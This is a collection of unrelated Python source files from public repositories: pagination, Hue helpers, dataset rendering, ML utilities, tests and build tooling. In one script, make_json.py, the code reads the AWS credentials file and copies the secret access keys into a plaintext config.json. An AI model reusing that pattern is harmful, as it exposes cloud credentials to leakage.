quantized=quantized,
**kwargs,
)
g = load_graph(path['model'], **kwargs)
inputs = ['Placeholder']
outputs = ['logits']
input_nodes, output_nodes = nodes_session(g, inputs, outputs)
return UNET1D(
input_nodes=input_nodes,
output_nodes=output_nodes,
sess=generate_session(graph=g, **kwargs),
model=model,
name=module,
)
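# Illustrative call (argument values are assumptions, not taken from this file):
#   model = load(model='unet', module='noise-reduction', quantized=False)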
|
qtapps/skrf_qtwidgets/analyzers/analyzer_rs_zva.py | mike0164/scikit-rf | 379 | 17906 | <gh_stars>100-1000
from skrf.vi.vna import rs_zva
class Analyzer(rs_zva.ZVA):
DEFAULT_VISA_ADDRESS = "GPIB::16::INSTR"
NAME = "Rhode & Schwartz ZVA"
NPORTS = 4
NCHANNELS = 32
SCPI_VERSION_TESTED = ''
|
silver/api/pagination.py | DocTocToc/silver | 222 | 17916 | # Copyright (c) 2015 Presslabs SRL
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
from rest_framework.pagination import PageNumberPagination
from rest_framework.response import Response
from rest_framework.settings import api_settings
from rest_framework.utils.urls import replace_query_param, remove_query_param
class LinkHeaderPagination(PageNumberPagination):
page_size = api_settings.PAGE_SIZE or 30
page_size_query_param = 'page_size'
max_page_size = 100
def get_last_link(self):
url = self.request.build_absolute_uri()
page_number = self.page.paginator.num_pages
return replace_query_param(url, self.page_query_param, page_number)
def get_first_link(self, display_page_query_param=True):
url = self.request.build_absolute_uri()
if display_page_query_param:
page_number = self.page.paginator.validate_number(1)
return replace_query_param(url, self.page_query_param, page_number)
else:
return remove_query_param(url, self.page_query_param)
def get_paginated_response(self, data):
next_url = self.get_next_link()
previous_url = self.get_previous_link()
first_url = self.get_first_link()
last_url = self.get_last_link()
if next_url is not None and previous_url is not None:
link = '<{next_url}>; rel="next", <{previous_url}>; rel="prev"'
elif next_url is not None:
link = '<{next_url}>; rel="next"'
elif previous_url is not None:
link = '<{previous_url}>; rel="prev"'
else:
link = ''
if link:
link += ', '
            link += '<{first_url}>; rel="first", <{last_url}>; rel="last"'
link = link.format(next_url=next_url, previous_url=previous_url,
first_url=first_url, last_url=last_url)
headers = {'Link': link} if link else {}
return Response(data, headers=headers)
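# Example of a produced Link header (illustrative URLs and page numbers):
#   Link: <https://api.example.com/items?page=3>; rel="next",
#         <https://api.example.com/items?page=1>; rel="prev",
#         <https://api.example.com/items?page=1>; rel="first",
#         <https://api.example.com/items?page=10>; rel="last"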
|
tests/cpydiff/modules_array_deletion.py | learnforpractice/micropython-cpp | 692 | 17921 | """
categories: Modules,array
description: Array deletion not implemented
cause: Unknown
workaround: Unknown
"""
import array
a = array.array('b', (1, 2, 3))
del a[1]
print(a)
|
homeassistant/components/hue/v2/helpers.py | MrDelik/core | 30,023 | 17927 | """Helper functions for Philips Hue v2."""
from __future__ import annotations
def normalize_hue_brightness(brightness: float | None) -> float | None:
"""Return calculated brightness values."""
if brightness is not None:
# Hue uses a range of [0, 100] to control brightness.
brightness = float((brightness / 255) * 100)
return brightness
def normalize_hue_transition(transition: float | None) -> float | None:
"""Return rounded transition values."""
if transition is not None:
# hue transition duration is in milliseconds and round them to 100ms
transition = int(round(transition, 1) * 1000)
return transition
def normalize_hue_colortemp(colortemp: int | None) -> int | None:
"""Return color temperature within Hue's ranges."""
if colortemp is not None:
# Hue only accepts a range between 153..500
colortemp = min(colortemp, 500)
colortemp = max(colortemp, 153)
return colortemp
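# Worked examples (illustrative): normalize_hue_brightness(255) -> 100.0,
# normalize_hue_transition(2) -> 2000, normalize_hue_colortemp(600) -> 500,
# normalize_hue_colortemp(100) -> 153.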
|
source_code/3-2-download.py | VickyMin1994/easy-scraping-tutorial | 708 | 17946 | <gh_stars>100-1000
import os
os.makedirs('./img/', exist_ok=True)
IMAGE_URL = "https://mofanpy.com/static/img/description/learning_step_flowchart.png"
def urllib_download():
from urllib.request import urlretrieve
urlretrieve(IMAGE_URL, './img/image1.png') # whole document
def request_download():
import requests
r = requests.get(IMAGE_URL)
with open('./img/image2.png', 'wb') as f:
f.write(r.content) # whole document
def chunk_download():
import requests
r = requests.get(IMAGE_URL, stream=True) # stream loading
with open('./img/image3.png', 'wb') as f:
for chunk in r.iter_content(chunk_size=32):
f.write(chunk)
urllib_download()
print('download image1')
request_download()
print('download image2')
chunk_download()
print('download image3')
|
make_json.py | jfalcou/infra | 135 | 17963 | <reponame>jfalcou/infra<gh_stars>100-1000
from configparser import ConfigParser
import os
import json
obj = {}
config = ConfigParser()
config.read(os.path.join(os.getenv("HOME"), ".aws", "credentials"))
obj["MY_ACCESS_KEY"] = config.get("default", "aws_access_key_id", fallback="")
obj["MY_SECRET_KEY"] = config.get("default", "aws_secret_access_key", fallback="")
with open("config.json", "w") as out:
json.dump(obj, out)
|
python-sdk/nuimages/scripts/render_images.py | bjajoh/nuscenes-devkit | 1,284 | 17972 | # nuScenes dev-kit.
# Code written by <NAME>, 2020.
import argparse
import gc
import os
import random
from typing import List
from collections import defaultdict
import cv2
import tqdm
from nuimages.nuimages import NuImages
def render_images(nuim: NuImages,
mode: str = 'all',
cam_name: str = None,
log_name: str = None,
sample_limit: int = 50,
filter_categories: List[str] = None,
out_type: str = 'image',
out_dir: str = '~/Downloads/nuImages',
cleanup: bool = True) -> None:
"""
Render a random selection of images and save them to disk.
Note: The images rendered here are keyframes only.
:param nuim: NuImages instance.
:param mode: What to render:
"image" for the image without annotations,
"annotated" for the image with annotations,
"trajectory" for a rendering of the trajectory of the vehice,
"all" to render all of the above separately.
:param cam_name: Only render images from a particular camera, e.g. "CAM_BACK'.
:param log_name: Only render images from a particular log, e.g. "n013-2018-09-04-13-30-50+0800".
:param sample_limit: Maximum number of samples (images) to render. Note that the mini split only includes 50 images.
:param filter_categories: Specify a list of object_ann category names. Every sample that is rendered must
contain annotations of any of those categories.
:param out_type: The output type as one of the following:
'image': Renders a single image for the image keyframe of each sample.
'video': Renders a video for all images/pcls in the clip associated with each sample.
:param out_dir: Folder to render the images to.
:param cleanup: Whether to delete images after rendering the video. Not relevant for out_type == 'image'.
"""
# Check and convert inputs.
assert out_type in ['image', 'video'], ' Error: Unknown out_type %s!' % out_type
all_modes = ['image', 'annotated', 'trajectory']
assert mode in all_modes + ['all'], 'Error: Unknown mode %s!' % mode
assert not (out_type == 'video' and mode == 'trajectory'), 'Error: Cannot render "trajectory" for videos!'
if mode == 'all':
if out_type == 'image':
modes = all_modes
elif out_type == 'video':
modes = [m for m in all_modes if m not in ['annotated', 'trajectory']]
else:
raise Exception('Error" Unknown mode %s!' % mode)
else:
modes = [mode]
if filter_categories is not None:
category_names = [c['name'] for c in nuim.category]
for category_name in filter_categories:
assert category_name in category_names, 'Error: Invalid object_ann category %s!' % category_name
# Create output folder.
out_dir = os.path.expanduser(out_dir)
if not os.path.isdir(out_dir):
os.makedirs(out_dir)
# Filter by camera.
sample_tokens = [s['token'] for s in nuim.sample]
if cam_name is not None:
sample_tokens_cam = []
for sample_token in sample_tokens:
sample = nuim.get('sample', sample_token)
key_camera_token = sample['key_camera_token']
sensor = nuim.shortcut('sample_data', 'sensor', key_camera_token)
if sensor['channel'] == cam_name:
sample_tokens_cam.append(sample_token)
sample_tokens = sample_tokens_cam
# Filter by log.
if log_name is not None:
sample_tokens_cleaned = []
for sample_token in sample_tokens:
sample = nuim.get('sample', sample_token)
log = nuim.get('log', sample['log_token'])
if log['logfile'] == log_name:
sample_tokens_cleaned.append(sample_token)
sample_tokens = sample_tokens_cleaned
# Filter samples by category.
if filter_categories is not None:
# Get categories in each sample.
sd_to_object_cat_names = defaultdict(lambda: set())
for object_ann in nuim.object_ann:
category = nuim.get('category', object_ann['category_token'])
sd_to_object_cat_names[object_ann['sample_data_token']].add(category['name'])
# Filter samples.
sample_tokens_cleaned = []
for sample_token in sample_tokens:
sample = nuim.get('sample', sample_token)
key_camera_token = sample['key_camera_token']
category_names = sd_to_object_cat_names[key_camera_token]
if any([c in category_names for c in filter_categories]):
sample_tokens_cleaned.append(sample_token)
sample_tokens = sample_tokens_cleaned
# Get a random selection of samples.
random.shuffle(sample_tokens)
# Limit number of samples.
sample_tokens = sample_tokens[:sample_limit]
print('Rendering %s for mode %s to folder %s...' % (out_type, mode, out_dir))
for sample_token in tqdm.tqdm(sample_tokens):
sample = nuim.get('sample', sample_token)
log = nuim.get('log', sample['log_token'])
log_name = log['logfile']
key_camera_token = sample['key_camera_token']
sensor = nuim.shortcut('sample_data', 'sensor', key_camera_token)
sample_cam_name = sensor['channel']
sd_tokens = nuim.get_sample_content(sample_token)
# We cannot render a video if there are missing camera sample_datas.
if len(sd_tokens) < 13 and out_type == 'video':
print('Warning: Skipping video for sample token %s, as not all 13 frames exist!' % sample_token)
continue
for mode in modes:
out_path_prefix = os.path.join(out_dir, '%s_%s_%s_%s' % (log_name, sample_token, sample_cam_name, mode))
if out_type == 'image':
write_image(nuim, key_camera_token, mode, '%s.jpg' % out_path_prefix)
elif out_type == 'video':
write_video(nuim, sd_tokens, mode, out_path_prefix, cleanup=cleanup)
def write_video(nuim: NuImages,
sd_tokens: List[str],
mode: str,
out_path_prefix: str,
cleanup: bool = True) -> None:
"""
Render a video by combining all the images of type mode for each sample_data.
:param nuim: NuImages instance.
:param sd_tokens: All sample_data tokens in chronological order.
:param mode: The mode - see render_images().
:param out_path_prefix: The file prefix used for the images and video.
:param cleanup: Whether to delete images after rendering the video.
"""
# Loop through each frame to create the video.
out_paths = []
for i, sd_token in enumerate(sd_tokens):
out_path = '%s_%d.jpg' % (out_path_prefix, i)
out_paths.append(out_path)
write_image(nuim, sd_token, mode, out_path)
# Create video.
first_im = cv2.imread(out_paths[0])
freq = 2 # Display frequency (Hz).
fourcc = cv2.VideoWriter_fourcc(*'MJPG')
video_path = '%s.avi' % out_path_prefix
out = cv2.VideoWriter(video_path, fourcc, freq, first_im.shape[1::-1])
# Load each image and add to the video.
for out_path in out_paths:
im = cv2.imread(out_path)
out.write(im)
# Delete temporary image if requested.
if cleanup:
os.remove(out_path)
# Finalize video.
out.release()
def write_image(nuim: NuImages, sd_token: str, mode: str, out_path: str) -> None:
"""
Render a single image of type mode for the given sample_data.
:param nuim: NuImages instance.
:param sd_token: The sample_data token.
:param mode: The mode - see render_images().
:param out_path: The file to write the image to.
"""
if mode == 'annotated':
nuim.render_image(sd_token, annotation_type='all', out_path=out_path)
elif mode == 'image':
nuim.render_image(sd_token, annotation_type='none', out_path=out_path)
elif mode == 'trajectory':
sample_data = nuim.get('sample_data', sd_token)
nuim.render_trajectory(sample_data['sample_token'], out_path=out_path)
else:
raise Exception('Error: Unknown mode %s!' % mode)
# Trigger garbage collection to avoid memory overflow from the render functions.
gc.collect()
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Render a random selection of images and save them to disk.')
parser.add_argument('--seed', type=int, default=42) # Set to 0 to disable.
parser.add_argument('--version', type=str, default='v1.0-mini')
parser.add_argument('--dataroot', type=str, default='/data/sets/nuimages')
parser.add_argument('--verbose', type=int, default=1)
parser.add_argument('--mode', type=str, default='all')
parser.add_argument('--cam_name', type=str, default=None)
parser.add_argument('--log_name', type=str, default=None)
parser.add_argument('--sample_limit', type=int, default=50)
parser.add_argument('--filter_categories', action='append')
parser.add_argument('--out_type', type=str, default='image')
parser.add_argument('--out_dir', type=str, default='~/Downloads/nuImages')
args = parser.parse_args()
# Set random seed for reproducible image selection.
if args.seed != 0:
random.seed(args.seed)
# Initialize NuImages class.
nuim_ = NuImages(version=args.version, dataroot=args.dataroot, verbose=bool(args.verbose), lazy=False)
# Render images.
render_images(nuim_, mode=args.mode, cam_name=args.cam_name, log_name=args.log_name, sample_limit=args.sample_limit,
filter_categories=args.filter_categories, out_type=args.out_type, out_dir=args.out_dir)
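# Example invocation (illustrative; the flags are defined by the argparse options above):
#   python render_images.py --version v1.0-mini --mode annotated --cam_name CAM_FRONT \
#       --out_type image --sample_limit 10 --out_dir ~/Downloads/nuImages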
|
controllers/social_auth/kivyauth/__init__.py | richierh/SalesKivyMD | 126 | 17977 | <filename>controllers/social_auth/kivyauth/__init__.py
from kivy.logger import Logger
from kivy.utils import platform
__version__ = "2.3.2"
_log_message = "KivyAuth:" + f" {__version__}" + f' (installed at "{__file__}")'
__all__ = ("login_providers", "auto_login")
Logger.info(_log_message)
|
tests/resources/selenium/test_nfc.py | Avi-Labs/taurus | 1,743 | 18011 | # coding=utf-8
import logging
import random
import string
import sys
import unittest
from time import time, sleep
import apiritif
import os
import re
from selenium import webdriver
from selenium.common.exceptions import NoSuchElementException, TimeoutException
from selenium.webdriver.common.by import By
from selenium.webdriver.common.action_chains import ActionChains
from selenium.webdriver.support.ui import Select
from selenium.webdriver.support import expected_conditions as econd
from selenium.webdriver.support.wait import WebDriverWait
from selenium.webdriver.common.keys import Keys
from bzt.resources.selenium_extras import waiter, get_locator
class TestSc1(unittest.TestCase):
def setUp(self):
self.vars = {}
timeout = 2.0
options = webdriver.FirefoxOptions()
profile = webdriver.FirefoxProfile()
profile.set_preference('webdriver.log.file', '/somewhere/webdriver.log')
options.set_capability('unhandledPromptBehavior', 'ignore')
self.driver = webdriver.Firefox(profile, options=options)
self.driver.implicitly_wait(timeout)
apiritif.put_into_thread_store(timeout=timeout, func_mode=False,
driver=self.driver, windows={}, scenario_name='sc1')
def _1_httpsblazedemocomsetup1(self):
with apiritif.smart_transaction('https://blazedemo.com/setup1'):
self.driver.get('https://blazedemo.com/setup1')
def _2_setup2(self):
with apiritif.smart_transaction('setup2'):
self.driver.get('https://blazedemo.com/setup2')
waiter()
def _3_httpsblazedemocommain1(self):
with apiritif.smart_transaction('https://blazedemo.com/main1'):
self.driver.get('https://blazedemo.com/main1')
def _4_main2(self):
with apiritif.smart_transaction('main2'):
self.driver.get('https://blazedemo.com/main2')
waiter()
def _5_httpsblazedemocomteardown1(self):
with apiritif.smart_transaction('https://blazedemo.com/teardown1'):
self.driver.get('https://blazedemo.com/teardown1')
def _6_teardown2(self):
with apiritif.smart_transaction('teardown2'):
self.driver.get('https://blazedemo.com/teardown2')
waiter()
def test_sc1(self):
try:
self._1_httpsblazedemocomsetup1()
self._2_setup2()
self._3_httpsblazedemocommain1()
self._4_main2()
finally:
apiritif.set_stage("teardown") # can't be interrupted
self._5_httpsblazedemocomteardown1()
self._6_teardown2()
def tearDown(self):
if self.driver:
self.driver.quit()
|
contrib/opencensus-ext-datadog/opencensus/ext/datadog/transport.py | Flared/opencensus-python | 650 | 18088 | <reponame>Flared/opencensus-python
import platform
import requests
class DDTransport(object):
""" DDTransport contains all the logic for sending Traces to Datadog
:type trace_addr: str
:param trace_addr: trace_addr specifies the host[:port] address of the
Datadog Trace Agent.
"""
def __init__(self, trace_addr):
self._trace_addr = trace_addr
self._headers = {
"Datadog-Meta-Lang": "python",
"Datadog-Meta-Lang-Interpreter": platform.platform(),
# Following the example of the Golang version it is prefixed
# OC for Opencensus.
"Datadog-Meta-Tracer-Version": "OC/0.0.1",
"Content-Type": "application/json",
}
@property
def trace_addr(self):
""" specifies the host[:port] address of the Datadog Trace Agent.
"""
return self._trace_addr
@property
def headers(self):
""" specifies the headers that will be attached to HTTP request sent to DD.
"""
return self._headers
def send_traces(self, trace):
""" Sends traces to the Datadog Tracing Agent
:type trace: dic
:param trace: Trace dictionary
"""
requests.post("http://" + self.trace_addr + "/v0.4/traces",
json=trace,
headers=self.headers)
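# Illustrative usage (values are assumptions): the local Datadog trace agent
# listens on port 8126 by default, so a transport is typically created as
#   transport = DDTransport("localhost:8126")
#   transport.send_traces(trace_payload)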
|
SCSCons/Variables/PackageVariable.py | Relintai/pandemonium_engine | 1,403 | 18096 | <reponame>Relintai/pandemonium_engine
# MIT License
#
# Copyright The SCons Foundation
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""Variable type for package Variables.
To be used whenever a 'package' may be enabled/disabled and the
package path may be specified.
Given these options ::
x11=no (disables X11 support)
x11=yes (will search for the package installation dir)
x11=/usr/local/X11 (will check this path for existence)
Can be used as a replacement for autoconf's ``--with-xxx=yyy`` ::
opts = Variables()
opts.Add(
PackageVariable(
key='x11',
help='use X11 installed here (yes = search some places)',
default='yes'
)
)
...
if env['x11'] == True:
dir = ... # search X11 in some standard places ...
env['x11'] = dir
if env['x11']:
... # build with x11 ...
"""
from typing import Tuple, Callable
import SCons.Errors
__all__ = ['PackageVariable',]
ENABLE_STRINGS = ('1', 'yes', 'true', 'on', 'enable', 'search')
DISABLE_STRINGS = ('0', 'no', 'false', 'off', 'disable')
def _converter(val):
""" """
lval = val.lower()
if lval in ENABLE_STRINGS:
return True
if lval in DISABLE_STRINGS:
return False
return val
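# Illustrative conversions: _converter('Yes') -> True, _converter('off') -> False,
# _converter('/usr/local/X11') -> '/usr/local/X11' (path strings pass through).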
def _validator(key, val, env, searchfunc) -> None:
""" """
# NB: searchfunc is currently undocumented and unsupported
# TODO write validator, check for path
import os
if env[key] is True:
if searchfunc:
env[key] = searchfunc(key, val)
elif env[key] and not os.path.exists(val):
raise SCons.Errors.UserError(
'Path does not exist for option %s: %s' % (key, val))
def PackageVariable(key, help, default, searchfunc=None) -> Tuple[str, str, str, Callable, Callable]:
"""Return a tuple describing a package list SCons Variable.
The input parameters describe a 'package list' option. Returns
a tuple including the correct converter and validator appended.
The result is usable as input to :meth:`Add` .
A 'package list' option may either be 'all', 'none' or a pathname
string. This information is appended to *help*.
"""
# NB: searchfunc is currently undocumented and unsupported
help = '\n '.join(
(help, '( yes | no | /path/to/%s )' % key))
return (key, help, default,
lambda k, v, e: _validator(k, v, e, searchfunc),
_converter)
# Local Variables:
# tab-width:4
# indent-tabs-mode:nil
# End:
# vim: set expandtab tabstop=4 shiftwidth=4:
|
tests/guinea-pigs/unittest/expected_failure.py | Tirzono/teamcity-messages | 105 | 18108 | <filename>tests/guinea-pigs/unittest/expected_failure.py
# coding=utf-8
import sys
from teamcity.unittestpy import TeamcityTestRunner
if sys.version_info < (2, 7):
from unittest2 import main, TestCase, expectedFailure
else:
from unittest import main, TestCase, expectedFailure
class TestSkip(TestCase):
def test_expected_failure(self):
self.fail("this should happen unfortunately")
test_expected_failure = expectedFailure(test_expected_failure)
main(testRunner=TeamcityTestRunner)
|
_Dist/NeuralNetworks/b_TraditionalML/MultinomialNB.py | leoatchina/MachineLearning | 1,107 | 18117 | <filename>_Dist/NeuralNetworks/b_TraditionalML/MultinomialNB.py<gh_stars>1000+
import numpy as np
from sklearn.preprocessing import OneHotEncoder
class MultinomialNB:
""" Naive Bayes algorithm with discrete inputs
Parameters
----------
alpha : float, optional (default=1.)
Smooth parameter used in Naive Bayes, default is 1 (which indicates a laplace smoothing)
Attributes
----------
enc : OneHotEncoder
One-Hot encoder used to transform (discrete) inputs
class_log_prior : np.ndarray of float
Log class prior used to calculate (linear) prediction
feature_log_prob : np.ndarray of float
Feature log probability used to calculate (linear) prediction
Examples
--------
>>> import numpy as np
>>> x = np.random.randint(0, 10, [1000, 10]) # Generate feature vectors
>>> y = np.random.randint(0, 5, 1000) # Generate labels
>>> nb = MultinomialNB().fit(x, y) # fit the model
>>> nb.predict(x) # (linear) prediction
>>> nb.predict_class(x) # predict labels
"""
def __init__(self, alpha=1.):
self.alpha = alpha
self.enc = self.class_log_prior = self.feature_log_prob = None
def fit(self, x, y, do_one_hot=True):
""" Fit the model with x & y
Parameters
----------
x : {list of float, np.ndarray of float}
Feature vectors used for training
Note: features are assumed to be discrete
y : {list of float, np.ndarray of float}
Labels used for training
do_one_hot : bool, optional (default=True)
Whether do one-hot encoding on x
Returns
-------
self : MultinomialNB
Returns self.
"""
if do_one_hot:
self.enc = OneHotEncoder(dtype=np.float32)
x = self.enc.fit_transform(x)
else:
self.enc = None
x = np.array(x, np.float32)
n = x.shape[0]
y = np.array(y, np.int8)
self.class_log_prior = np.log(np.bincount(y) / n)
masks = [y == i for i in range(len(self.class_log_prior))]
masked_xs = [x[mask] for mask in masks]
feature_counts = np.array([np.asarray(masked_x.sum(0))[0] for masked_x in masked_xs])
smoothed_fc = feature_counts + self.alpha
self.feature_log_prob = np.log(smoothed_fc / smoothed_fc.sum(1, keepdims=True))
return self
def _predict(self, x):
""" Internal method for calculating (linear) predictions
Parameters
----------
x : {np.ndarray of float, scipy.sparse.csr.csr_matrix of float}
One-Hot encoded feature vectors
Returns
-------
predictions : np.ndarray of float
Returns (linear) predictions.
"""
return x.dot(self.feature_log_prob.T) + self.class_log_prior
def predict(self, x):
""" API for calculating (linear) predictions
Parameters
----------
x : {list of float, np.ndarray of float}
Target feature vectors
Returns
-------
predictions : np.ndarray of float
Returns (linear) predictions.
"""
if self.enc is not None:
x = self.enc.transform(x)
return self._predict(x)
def predict_class(self, x):
""" API for predicting labels
Parameters
----------
x : {list of float, np.ndarray of float}
Target feature vectors
Returns
-------
labels : np.ndarray of int
Returns labels.
"""
return np.argmax(self.predict(x), 1)
|
batch_score.py | Lufedi/reaper | 106 | 18120 | <reponame>Lufedi/reaper
#!/usr/bin/env python3
import argparse
import os
import sys
import traceback
from lib import core, utilities, run
from lib.attributes import Attributes
from lib.database import Database
def process_arguments():
"""
Uses the argparse module to parse commandline arguments.
Returns:
Dictionary of parsed commandline arguments.
"""
parser = argparse.ArgumentParser(
description='Calculate the scores of a set of repositories.'
)
parser.add_argument(
'--cleanup',
action='store_true',
dest='cleanup',
help='Delete cloned repositories from the disk when done.'
)
parser.add_argument(
'-c',
'--config',
type=argparse.FileType('r'),
default='config.json',
dest='config_file',
help='Path to the configuration file.'
)
parser.add_argument(
'-m',
'--manifest',
type=argparse.FileType('r'),
default='manifest.json',
dest='manifest_file',
help='Path to the manifest file.'
)
parser.add_argument(
'-r',
'--repositories-root',
dest='repositories_root',
help='Path to the root of downloaded repositories.'
)
parser.add_argument(
'-s',
'--repositories-sample',
type=argparse.FileType('r'),
dest='repositories_sample',
help='A file containing newline-separated GHTorrent project ids'
)
parser.add_argument(
'-k',
'--key-string',
type=str,
dest='key_string',
default=None,
required=False,
help='String of attribute initials. Uppercase to persist data'
)
parser.add_argument(
'-n',
'--num-processes',
type=int,
dest='num_processes',
default=1,
required=False,
help=(
'Number of processes to spawn when processing repositories'
' from the samples file.'
)
)
parser.add_argument(
'--goldenset',
action='store_true',
dest='goldenset',
help=(
'Indicate that the repositories sample file contains projects'
' from the Golden Set.'
)
)
if len(sys.argv) < 2:
parser.print_help()
sys.exit(1)
return parser.parse_args()
def main():
"""
Main execution flow.
"""
try:
args = process_arguments()
config = utilities.read(args.config_file)
manifest = utilities.read(args.manifest_file)
# TODO: Refactor
core.config = config
utilities.TOKENIZER = core.Tokenizer()
database = Database(config['options']['datasource'])
globaloptions = {
'today': config['options']['today'],
'timeout': config['options']['timeout']
}
attributes = Attributes(
manifest['attributes'], database, args.cleanup, args.key_string,
**globaloptions
)
if not os.path.exists(args.repositories_root):
os.makedirs(args.repositories_root, exist_ok=True)
table = 'reaper_results'
if args.goldenset:
table = 'reaper_goldenset'
_run = run.Run(
args.repositories_root, attributes, database,
config['options']['threshold'], args.num_processes
)
_run.run([int(line) for line in args.repositories_sample], table)
except Exception as e:
extype, exvalue, extrace = sys.exc_info()
traceback.print_exception(extype, exvalue, extrace)
if __name__ == '__main__':
try:
main()
except KeyboardInterrupt:
print('\rCaught interrupt, killing all children...')
|
tests/data/samplers/bucket_batch_sampler_test.py | MSLars/allennlp | 11,433 | 18165 | <gh_stars>1000+
from allennlp.common import Params
from allennlp.data import Instance, Token, Batch
from allennlp.data.fields import TextField
from allennlp.data.samplers import BucketBatchSampler
from allennlp.data.data_loaders import MultiProcessDataLoader
from .sampler_test import SamplerTest
class TestBucketSampler(SamplerTest):
def test_create_batches_groups_correctly(self):
sampler = BucketBatchSampler(batch_size=2, padding_noise=0, sorting_keys=["text"])
grouped_instances = []
for indices in sampler.get_batch_indices(self.instances):
grouped_instances.append([self.instances[idx] for idx in indices])
expected_groups = [
[self.instances[4], self.instances[2]],
[self.instances[0], self.instances[1]],
[self.instances[3]],
]
for group in grouped_instances:
assert group in expected_groups
expected_groups.remove(group)
assert expected_groups == []
def test_disable_shuffle(self):
sampler = BucketBatchSampler(batch_size=2, sorting_keys=["text"], shuffle=False)
grouped_instances = []
for indices in sampler.get_batch_indices(self.instances):
grouped_instances.append([self.instances[idx] for idx in indices])
expected_groups = [
[self.instances[4], self.instances[2]],
[self.instances[0], self.instances[1]],
[self.instances[3]],
]
for idx, group in enumerate(grouped_instances):
assert group == expected_groups[idx]
def test_guess_sorting_key_picks_the_longest_key(self):
sampler = BucketBatchSampler(batch_size=2, padding_noise=0)
instances = []
short_tokens = [Token(t) for t in ["what", "is", "this", "?"]]
long_tokens = [Token(t) for t in ["this", "is", "a", "not", "very", "long", "passage"]]
instances.append(
Instance(
{
"question": TextField(short_tokens, self.token_indexers),
"passage": TextField(long_tokens, self.token_indexers),
}
)
)
instances.append(
Instance(
{
"question": TextField(short_tokens, self.token_indexers),
"passage": TextField(long_tokens, self.token_indexers),
}
)
)
instances.append(
Instance(
{
"question": TextField(short_tokens, self.token_indexers),
"passage": TextField(long_tokens, self.token_indexers),
}
)
)
assert sampler.sorting_keys is None
sampler._guess_sorting_keys(instances)
assert sampler.sorting_keys == ["passage"]
def test_from_params(self):
params = Params({})
sorting_keys = ["s1", "s2"]
params["sorting_keys"] = sorting_keys
params["batch_size"] = 32
sampler = BucketBatchSampler.from_params(params=params)
assert sampler.sorting_keys == sorting_keys
assert sampler.padding_noise == 0.1
assert sampler.batch_size == 32
params = Params(
{
"sorting_keys": sorting_keys,
"padding_noise": 0.5,
"batch_size": 100,
"drop_last": True,
}
)
sampler = BucketBatchSampler.from_params(params=params)
assert sampler.sorting_keys == sorting_keys
assert sampler.padding_noise == 0.5
assert sampler.batch_size == 100
assert sampler.drop_last
def test_drop_last_works(self):
sampler = BucketBatchSampler(
batch_size=2,
padding_noise=0,
sorting_keys=["text"],
drop_last=True,
)
# We use a custom collate_fn for testing, which doesn't actually create tensors,
# just the allennlp Batches.
def collate_fn(x, **kwargs):
return Batch(x)
data_loader = MultiProcessDataLoader(
self.get_mock_reader(),
"fake_path",
batch_sampler=sampler,
)
data_loader.collate_fn = collate_fn
data_loader.index_with(self.vocab)
batches = [batch for batch in iter(data_loader)]
stats = self.get_batches_stats(batches)
# all batches have length batch_size
assert all(batch_len == 2 for batch_len in stats["batch_lengths"])
# we should have lost one instance by skipping the last batch
assert stats["total_instances"] == len(self.instances) - 1
def test_batch_count(self):
sampler = BucketBatchSampler(batch_size=2, padding_noise=0, sorting_keys=["text"])
data_loader = MultiProcessDataLoader(
self.get_mock_reader(), "fake_path", batch_sampler=sampler
)
data_loader.index_with(self.vocab)
assert len(data_loader) == 3
def test_batch_count_with_drop_last(self):
sampler = BucketBatchSampler(
batch_size=2,
padding_noise=0,
sorting_keys=["text"],
drop_last=True,
)
data_loader = MultiProcessDataLoader(
self.get_mock_reader(), "fake_path", batch_sampler=sampler
)
assert len(data_loader) == 2
|
river/compose/renamer.py | online-ml/creme | 1,105 | 18196 | <filename>river/compose/renamer.py
from typing import Dict
from river import base
__all__ = ["Renamer", "Prefixer", "Suffixer"]
class Renamer(base.Transformer):
"""Renames features following substitution rules.
Parameters
----------
mapping
        Dictionary describing substitution rules. Keys in `mapping` that are not a feature's name are silently ignored.
Examples
--------
>>> from river import compose
>>> mapping = {'a': 'v', 'c': 'o'}
>>> x = {'a': 42, 'b': 12}
>>> compose.Renamer(mapping).transform_one(x)
{'b': 12, 'v': 42}
"""
def __init__(self, mapping: Dict[str, str]):
self.mapping = mapping
def transform_one(self, x):
for old_key, new_key in self.mapping.items():
try:
x[new_key] = x.pop(old_key)
except KeyError:
pass # Ignoring keys that are not a feature's name
return x
class Prefixer(base.Transformer):
"""Prepends a prefix on features names.
Parameters
----------
prefix
Examples
--------
>>> from river import compose
>>> x = {'a': 42, 'b': 12}
>>> compose.Prefixer('prefix_').transform_one(x)
{'prefix_a': 42, 'prefix_b': 12}
"""
def __init__(self, prefix: str):
self.prefix = prefix
def _rename(self, s: str) -> str:
return f"{self.prefix}{s}"
def transform_one(self, x):
return {self._rename(i): xi for i, xi in x.items()}
class Suffixer(base.Transformer):
"""Appends a suffix on features names.
Parameters
----------
suffix
Examples
--------
>>> from river import compose
>>> x = {'a': 42, 'b': 12}
>>> compose.Suffixer('_suffix').transform_one(x)
{'a_suffix': 42, 'b_suffix': 12}
"""
def __init__(self, suffix: str):
self.suffix = suffix
def _rename(self, s: str) -> str:
return f"{s}{self.suffix}"
